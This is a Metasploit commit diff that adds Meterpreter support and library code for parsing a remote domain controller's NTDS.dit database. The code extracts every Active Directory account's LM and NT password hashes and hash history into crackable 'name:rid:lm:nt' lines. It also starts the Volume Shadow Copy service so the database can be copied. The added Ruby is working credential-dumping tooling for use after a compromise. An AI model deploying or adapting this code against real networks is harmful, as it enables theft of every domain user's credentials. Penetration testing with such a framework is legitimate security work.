Land rapid7#5348, meterpreter support and post modules for parsing NTDS

Author: Brent Cook

lib/metasploit/framework/ntds/account.rb

@@ -0,0 +1,165 @@
+module Metasploit
+  module Framework
+    module NTDS
+      # This class represents an NTDS account structure as sent back by Meterpreter's
+      # priv extension.
+      class Account
+
+        # Size of an NTDS Account Struct on the Wire
+        ACCOUNT_SIZE = 3016
+        # Size of a Date or Time Format String on the Wire
+        DATE_TIME_STRING_SIZE = 30
+        # Size of the AccountDescription Field
+        DESCRIPTION_SIZE =1024
+        # Size of a Hash History Record
+        HASH_HISTORY_SIZE = 792
+        # Size of a Hash String
+        HASH_SIZE = 33
+        # Size of the samAccountName field
+        NAME_SIZE = 128
+
+        #@return [String] The AD Account Description
+        attr_accessor :description
+        #@return [Boolean] If the AD account is disabled
+        attr_accessor :disabled
+        #@return [Boolean] If the AD account password is expired
+        attr_accessor :expired
+        #@return [String] Human Readable Date for the account's password expiration
+        attr_accessor :expiry_date
+        #@return [String] The LM Hash of the current password
+        attr_accessor :lm_hash
+        #@return [Array<String>] The LM hashes for previous passwords, up to 24
+        attr_accessor :lm_history
+        #@return [Fixnum] The count of historical LM hashes
+        attr_accessor :lm_history_count
+        #@return [Boolean] If the AD account is locked
+        attr_accessor :locked
+        #@return [Fixnum] The number of times this account has logged in
+        attr_accessor :logon_count
+        #@return [String] Human Readable Date for the last time the account logged in
+        attr_accessor :logon_date
+        #@return [String] Human Readable Time for the last time the account logged in
+        attr_accessor :logon_time
+        #@return [String] The samAccountName of the account
+        attr_accessor :name
+        #@return [Boolean] If the AD account password does not expire
+        attr_accessor :no_expire
+        #@return [Boolean] If the AD account does not require a password
+        attr_accessor :no_pass
+        #@return [String] The NT Hash of the current password
+        attr_accessor :nt_hash
+        #@return [Array<String>] The NT hashes for previous passwords, up to 24
+        attr_accessor :nt_history
+        #@return [Fixnum] The count of historical NT hashes
+        attr_accessor :nt_history_count
+        #@return [String] Human Readable Date for the last password change
+        attr_accessor :pass_date
+        #@return [String] Human Readable Time for the last password change
+        attr_accessor :pass_time
+        #@return [Fixnum] The Relative ID of the account
+        attr_accessor :rid
+        #@return [String] Byte String for the Account's SID
+        attr_accessor :sid
+
+        # @param raw_data [String] the raw 3948 byte string from the wire
+        # @raise [ArgumentErrror] if a 3948 byte string is not supplied
+        def initialize(raw_data)
+          raise ArgumentError, "No Data Supplied" unless raw_data.present?
+          raise ArgumentError, "Invalid Data" unless raw_data.length == ACCOUNT_SIZE
+          data = raw_data.dup
+          @name = get_string(data,NAME_SIZE)
+          @description = get_string(data,DESCRIPTION_SIZE)
+          @rid = get_int(data)
+          @disabled = get_boolean(data)
+          @locked = get_boolean(data)
+          @no_pass = get_boolean(data)
+          @no_expire = get_boolean(data)
+          @expired = get_boolean(data)
+          @logon_count = get_int(data)
+          @nt_history_count = get_int(data)
+          @lm_history_count = get_int(data)
+          @expiry_date = get_string(data,DATE_TIME_STRING_SIZE)
+          @logon_date =  get_string(data,DATE_TIME_STRING_SIZE)
+          @logon_time = get_string(data,DATE_TIME_STRING_SIZE)
+          @pass_date = get_string(data,DATE_TIME_STRING_SIZE)
+          @pass_time = get_string(data,DATE_TIME_STRING_SIZE)
+          @lm_hash = get_string(data,HASH_SIZE)
+          @nt_hash = get_string(data,HASH_SIZE)
+          @lm_history = get_hash_history(data)
+          @nt_history = get_hash_history(data)
+          @sid = data
+        end
+
+        # @return [String] String representation of the account data
+        def to_s
+          <<-EOS.strip_heredoc
+          #{@name} (#{@description})
+          #{@name}:#{@rid}:#{ntlm_hash}
+          Password Expires: #{@expiry_date}
+          Last Password Change: #{@pass_time} #{@pass_date}
+          Last Logon: #{@logon_time} #{@logon_date}
+          Logon Count: #{@logon_count}
+          #{uac_string}
+          Hash History:
+          #{hash_history}
+          EOS
+        end
+
+        # @return [String] the NTLM hash string for the current password
+        def ntlm_hash
+          "#{@lm_hash}:#{@nt_hash}"
+        end
+
+        # @return [String] Each historical NTLM Hash on a new line
+        def hash_history
+          history_string = ''
+          @lm_history.each_with_index do | lm_hash, index|
+            history_string << "#{@name}:#{@rid}:#{lm_hash}:#{@nt_history[index]}\n"
+          end
+          history_string
+        end
+
+        private
+
+        def get_boolean(data)
+          get_int(data) == 1
+        end
+
+        def get_hash_history(data)
+          raw_history = data.slice!(0,HASH_HISTORY_SIZE)
+          split_history = raw_history.scan(/.{1,33}/)
+          split_history.map!{ |hash| hash.gsub(/\x00/,'')}
+          split_history.reject!{ |hash| hash.blank? }
+        end
+
+        def get_int(data)
+          data.slice!(0,4).unpack('L').first
+        end
+
+        def get_string(data,length)
+          data.slice!(0,length).gsub(/\x00/,'')
+        end
+
+        def uac_string
+          status_string = ''
+          if @disabled
+            status_string << " - Account Disabled\n"
+          end
+          if @expired
+            status_string << " - Password Expired\n"
+          end
+          if @locked
+            status_string << " - Account Locked Out\n"
+          end
+          if @no_expire
+            status_string << " - Password Never Expires\n"
+          end
+          if @no_pass
+            status_string << " - No Password Required\n"
+          end
+          status_string
+        end
+      end
+    end
+  end
+end

lib/metasploit/framework/ntds/parser.rb

@@ -0,0 +1,70 @@
+module Metasploit
+  module Framework
+    module NTDS
+      require 'metasploit/framework/ntds/account'
+      # This class respresent an NTDS parser. It interacts with the Meterpreter Client
+      # to provide a simple interface for enumerating AD user accounts.
+      class Parser
+
+        # The size, in Bytes, of a batch of NTDS accounts
+        BATCH_SIZE = (Metasploit::Framework::NTDS::Account::ACCOUNT_SIZE * 20)
+
+        #@return [Rex::Post::Meterpreter::Channels::Pool] The Meterpreter NTDS Parser Channel
+        attr_accessor :channel
+        #@return [Msf::Session] The Meterpreter Client
+        attr_accessor :client
+        #@return [String] The path to the NTDS.dit file on the remote system
+        attr_accessor :file_path
+
+        def initialize(client, file_path='')
+          raise ArgumentError, "Invalid Filepath" unless file_path.present?
+          @file_path = file_path
+          @channel = client.extapi.ntds.parse(file_path)
+          @client = client
+        end
+
+        # Yields a [Metasploit::Framework::NTDS::Account] for each account found
+        # in the remote NTDS.dit file.
+        #
+        # @yield [account]
+        # @yieldparam account [Metasploit::Framework::NTDS::Account] an AD user account
+        # @yieldreturn [void] does not return a value
+         def each_account
+           raw_batch_data = pull_batch
+           until raw_batch_data.nil?
+             batch = raw_batch_data.dup
+             while batch.present?
+               raw_data = batch.slice!(0,Metasploit::Framework::NTDS::Account::ACCOUNT_SIZE)
+               # Make sure our data isn't all Null-bytes
+               if raw_data.match(/[^\x00]/)
+                 account = Metasploit::Framework::NTDS::Account.new(raw_data)
+                 yield account
+               end
+             end
+             raw_batch_data = pull_batch
+           end
+           channel.close
+         end
+
+        private
+
+        def pull_batch
+          if channel.cid.nil?
+            reopen_channel
+          end
+          begin
+            raw_batch_data = channel.read(BATCH_SIZE)
+          rescue EOFError
+            raw_batch_data = nil
+          end
+          raw_batch_data
+        end
+
+        def reopen_channel
+          @channel = client.extapi.ntds.parse(file_path)
+        end
+
+      end
+    end
+  end
+end

lib/msf/core/post/windows/shadowcopy.rb

@@ -182,6 +182,25 @@ def start_vss
         return false
       end
     end
+    unless start_swprv
+      return false
+    end
+    return true
+  end
+
+  def start_swprv
+    vss_state = wmic_query('Service where(name="swprv") get state')
+    if vss_state=~ /Running/
+      print_status("Software Shadow Copy service is running.")
+    else
+      print_status("Software Shadow Copy service not running. Starting it now...")
+      if service_restart("swprv", START_TYPE_MANUAL)
+        print_good("Software Shadow Copy started successfully.")
+      else
+        print_error("Insufficient Privs to start service!")
+        return false
+      end
+    end
     return true
   end
 

lib/rex/post/meterpreter/extensions/extapi/extapi.rb

@@ -5,6 +5,7 @@
 require 'rex/post/meterpreter/extensions/extapi/service/service'
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
 require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
+require 'rex/post/meterpreter/extensions/extapi/ntds/ntds'
 require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
 
 module Rex
@@ -34,6 +35,7 @@ def initialize(client)
               'service'   => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
               'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
               'adsi'      => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
+              'ntds'      => Rex::Post::Meterpreter::Extensions::Extapi::Ntds::Ntds.new(client),
               'wmi'       => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
             })
         },

lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb

@@ -0,0 +1,39 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Ntds
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# parsing the NT Directory Service database.
+#
+###
+class Ntds
+
+  def initialize(client)
+    @client = client
+  end
+
+  def parse(filepath)
+    request = Packet.create_request('extapi_ntds_parse')
+    request.add_tlv( TLV_TYPE_NTDS_PATH, filepath)
+    # wait up to 90 seconds for a response
+    response = client.send_request(request, 90)
+    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
+    if channel_id.nil?
+      raise Exception, "We did not get a channel back!"
+    end
+    Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "extapi_ntds", CHANNEL_FLAG_SYNCHRONOUS)
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end
+

lib/rex/post/meterpreter/extensions/extapi/tlv.rb

@@ -72,6 +72,9 @@ module Extapi
 TLV_TYPE_EXT_ADSI_PATH_TYPE                 = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
 TLV_TYPE_EXT_ADSI_DN                        = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
 
+TLV_TYPE_NTDS_TEST                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 80)
+TLV_TYPE_NTDS_PATH                          = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 81)
+
 TLV_TYPE_EXT_WMI_DOMAIN                     = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 90)
 TLV_TYPE_EXT_WMI_QUERY                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 91)
 TLV_TYPE_EXT_WMI_FIELD                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 92)

modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb

@@ -13,7 +13,7 @@
 
 module Metasploit4
 
-  CachedSize = 1102898
+  CachedSize = 1104434
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb

@@ -13,7 +13,7 @@
 
 module Metasploit4
 
-  CachedSize = 1103942
+  CachedSize = 1105478
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb

@@ -13,7 +13,7 @@
 
 module Metasploit4
 
-  CachedSize = 1103942
+  CachedSize = 1105478
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb

@@ -13,7 +13,7 @@
 
 module Metasploit4
 
-  CachedSize = 1102898
+  CachedSize = 1104434
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows